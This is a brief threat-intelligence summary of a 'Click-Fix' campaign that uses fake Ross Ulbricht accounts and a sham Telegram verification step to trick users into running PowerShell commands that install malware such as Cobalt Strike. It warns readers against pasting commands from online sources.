Summary: Threat actors are exploiting news about Ross Ulbricht to lure users into a malicious Telegram channel, tricking them into executing PowerShell commands that install malware. This new variant of the “Click-Fix” tactic masquerades as a verification process, leveraging fake accounts to gain trust. Users are warned to be cautious of executing any commands copied from online sources, especially in PowerShell or the Windows Run dialog.

Threat Actor: Unknown | unknown
Victim: Unsuspecting users | unsuspecting users

Keypoints :

• Threat actors use fake verified accounts of Ross Ulbricht to direct users to malicious Telegram channels.
• The verification process involves executing PowerShell commands under the guise of a CAPTCHA system.
• The malware delivered may include Cobalt Strike, a tool used for gaining unauthorized access to systems.